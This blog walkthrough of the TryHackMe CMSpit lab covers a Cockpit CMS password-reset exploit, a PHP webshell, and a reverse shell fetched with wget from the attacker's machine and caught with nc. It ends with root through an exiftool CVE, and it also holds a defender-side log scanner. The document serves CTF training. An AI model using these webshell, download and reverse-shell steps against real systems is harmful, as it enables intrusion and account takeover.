narancs's blog

TryHackMe – CMSpit walkthrough

Introduction

This is a walkthrough of the CMSpit room on TryHackMe. We need to gain access to the target machine through a vulnerable CMS and escalate to root.

You've identified that the CMS installed on the web server has several vulnerabilities that allow attackers to enumerate users and change account passwords. Your mission is to exploit these vulnerabilities and compromise the web server.

Enumeration

What is the name of the Content Management System (CMS) installed on the server?

We can get this answer from the login page of the website.

Answer: C*****t

What is the version of the Content Management System (CMS) installed on the server?

I found the answer by checking the source code of the login page.

Answer: v*****1

What is the path that allows user enumeration?

Knowing the CMS name and version, we can start looking for known exploits. I found the following write-up that explains the vulnerability in great detail: https://swarm.ptsecurity.com/rce-cockpit-cms/. In section 1, ‘Using the $eq operator’, there are several Burp Suite screenshots that show the URL path in question.

Answer: /a********k

How many users can you identify when you reproduce the user enumeration attack?

I found an exploit for this vulnerability on GitHub: https://github.com/0z09e/CVE-2020-35846

The script sends two requests through a proxy:

    ...
    resetrequest = session.post(url + "/auth/requestreset" , json=request_data , proxies={"http" :"http://127.0.0.1:8080"})
    ...
    token_request = session.post(url + "/auth/resetpassword"  , json=token_data , proxies={"http" :"http://127.0.0.1:8080"})
    ...

So we need to start a proxy on port 8080 (e.g. Burp Suite), or remove the proxies={"http" :"http://127.0.0.1:8080"} argument from both calls in the code. Then we can run the script against the target:

    python3 exploit.py http://<IP_ADDRESS>/

Answer: Number of users in the output of the script :)

What is the path that allows you to change user account passwords?

The answer can be found in the above script on GitHub by looking at the change_pass function and checking the URL path it sends its request to.

Answer: /a****************d

Exploitation

Compromise the Content Management System (CMS). What is Skidy's email?

If you have successfully executed the script above, you can see in its output that the password of the admin user has been changed to P@ssw0rd. We can log in with these credentials and visit the /accounts page to find Skidy's email address.

Answer: The e-mail address of the Skidy user from the /accounts page

What is the web flag?

You can also see something similar in the output of the script:

    [+] Bingoo, File has been deployed successfully : vd1XDi.php
    [+] File's location : http://10.10.190.141/vd1XDi.php
    [*] Execution example : http://10.10.190.141/vd1XDi.php?cmd=id
    [+] Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [+] Good luck for Privilege Escalation :)

This means that a webshell was uploaded to the target, and we can execute commands with it.

    http://10.10.190.141/nUSvk3.php?cmd=ls -l

Once we visit this page, we see a list of the files in the root directory of the webserver. One of them is named webflag.php, so we can use the cat command to display the contents of this file. We then need to view the page source, otherwise the output is not visible because it is PHP code.

    view-source:http://10.10.190.141/vd1XDi.php?cmd=cat%20webflag.php

Answer: Grab the flag from webflag.php

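As an added, defender-side example (not code from the walkthrough or from either exploit repository), the following Python scans constructed Apache-style access-log lines for the two request patterns this chain leaves behind: POSTs to Cockpit's /auth/requestreset and /auth/resetpassword endpoints, and GETs to a .php file carrying a cmd= parameter. The burst threshold and the sample log lines are assumptions.

```python
"""Flag the web traffic this exploit chain produces in an access log.
Added defender-side example, not from the walkthrough or the exploit scripts."""
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client - - [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Reset endpoints the exploit script posts to (from the walkthrough's excerpt).
RESET_PATHS = {"/auth/requestreset", "/auth/resetpassword"}
# Assumption: this many POSTs to the reset endpoints from one client is abnormal.
RESET_BURST = 3

# Constructed sample lines: one normal visitor (10.0.0.5) and one attacker (10.0.0.9).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2021:12:00:01 +0000] "GET /auth/login HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2021:12:00:02 +0000] "POST /auth/requestreset HTTP/1.1" 200 57 "-" "python-requests/2.25"
10.0.0.9 - - [10/Oct/2021:12:00:02 +0000] "POST /auth/resetpassword HTTP/1.1" 200 40 "-" "python-requests/2.25"
10.0.0.9 - - [10/Oct/2021:12:00:03 +0000] "POST /auth/requestreset HTTP/1.1" 200 57 "-" "python-requests/2.25"
10.0.0.9 - - [10/Oct/2021:12:00:05 +0000] "GET /vd1XDi.php?cmd=id HTTP/1.1" 200 61 "-" "python-requests/2.25"
10.0.0.9 - - [10/Oct/2021:12:00:40 +0000] "GET /vd1XDi.php?cmd=cat%20webflag.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2021:12:01:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
"""

def scan(lines):
    """Return (client_ip, kind, detail) tuples; kind is 'reset-abuse' or 'webshell'."""
    findings, reset_hits = [], {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, method, target = m["ip"], m["method"], m["target"]
        parts = urlsplit(target)
        query = parse_qs(parts.query)
        # A .php file answering to ?cmd=... is the webshell pattern seen above.
        if parts.path.endswith(".php") and "cmd" in query:
            findings.append((ip, "webshell", f"{parts.path} cmd={query['cmd'][0]!r}"))
        # Repeated POSTs to the reset endpoints: enumeration / reset abuse.
        if method == "POST" and parts.path in RESET_PATHS:
            reset_hits[ip] = reset_hits.get(ip, 0) + 1
            if reset_hits[ip] == RESET_BURST:
                findings.append((ip, "reset-abuse", f"{RESET_BURST} POSTs to reset endpoints"))
    return findings

if __name__ == "__main__":
    for ip, kind, detail in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip} {kind}: {detail}")
```

Feed it real log lines with scan(open(path)) and it reports each webshell command and each client that crosses the reset burst threshold.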
Compromise the machine and enumerate collections in the document database installed on the server. What is the flag in the database?

I gained a shell on the target using the following steps:

  • I downloaded the reverse shell from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
  • I changed the following lines accordingly:
    $ip = '127.0.0.1'; // CHANGE THIS
    $port = 1234; // CHANGE THIS
  • I started a Python HTTP server to serve the file over HTTP:
    python3 -m http.server
  • I used the webshell to download the reverse shell onto the target machine:
    http://10.10.190.141/vd1XDi.php?cmd=wget%20http://10.11.11.184:8000/rev_shell.php
  • I started a listener on the port I specified in the reverse shell:
    nc -lvnp 1234
  • I visited http://10.10.190.141/rev_shell.php and received a shell.

Then I stabilized the shell with the following commands:

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    export TERM=xterm
    Ctrl+Z
    stty raw -echo; fg

I started looking around on the host. Eventually I found a file named .dbshell in the home directory of stux. One of the commands in that file contained the flag that was inserted into the database.

Answer: Get the flag from the .dbshell file

What is the user.txt flag?

The .dbshell file contains the command that was used to insert the user stux into the database. We can use the same password to switch to the stux user on Linux, because the password was reused.

Answer: Switch to the stux user with the su command and grab the flag from user.txt

What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000-0000

We can check which commands stux can execute with sudo:

    stux@ubuntu:~$ sudo -l
    Matching Defaults entries for stux on ubuntu:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User stux may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/local/bin/exiftool
    stux@ubuntu:~$

I checked for vulnerabilities in exiftool and found the following: https://nvd.nist.gov/vuln/detail/CVE-2021-22204

Answer: CVE-2021-22204

What is the utility used to create the PoC file?

I found an exploit for the vulnerability here: https://github.com/UNICORDev/exploit-CVE-2021-22204

In the script file exploit-CVE-2021-22204.py there is a function called dependencies that defines the following variable:

    deps = {'bzz':"sudo apt install djvulibre-bin",'djvumake':"sudo apt install djvulibre-bin",'exiftool':"sudo apt install exiftool"}

The name of the utility is listed in these dependencies.

Answer: d******e

Escalate your privileges. What is the flag in root.txt?

Using the exploit at https://github.com/UNICORDev/exploit-CVE-2021-22204, we can create a malicious JPG file on our local machine. Then we can transfer that file to the target to perform the exploit.

Install the dependencies:

    sudo apt install djvulibre-bin exiftool

Run the exploit:

    python3 exploit.py -c '/bin/bash'

Transfer the file to the target (e.g. using a Python HTTP server).

Use exiftool on the target, and get the root flag!
